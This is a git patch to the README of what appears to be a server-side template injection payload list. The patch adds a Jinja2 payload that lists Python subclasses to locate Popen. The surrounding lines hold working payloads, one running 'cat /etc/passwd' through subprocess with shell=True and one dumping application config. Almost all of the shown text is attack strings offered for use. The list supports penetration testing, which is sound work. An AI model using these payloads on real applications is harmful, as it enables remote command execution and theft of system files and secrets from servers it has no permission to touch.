From 043503b4fd948edc1f2d491a0bda9305a4f0d7e0 Mon Sep 17 00:00:00 2001
From: Ayham Al-Ali <alali_ayham@yahoo.com>
Date: Sat, 7 Jan 2023 04:25:03 +0300
Subject: [PATCH] Enhancements

---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index e90bcec..4270865 100644
--- a/README.md
+++ b/README.md
@@ -17,7 +17,7 @@ Even in cases where full remote code execution is not possible, an attacker can
 
 #### Payloads :
 
-```
+```py
 {{2*2}}[[3*3]]
 {{3*3}}
 {{3*'3'}}
@@ -33,6 +33,7 @@ ${{3*3}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.__base__.__subclasses__()}} # Search for Popen process, use payload below change 227 to index of Popen
 {{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}}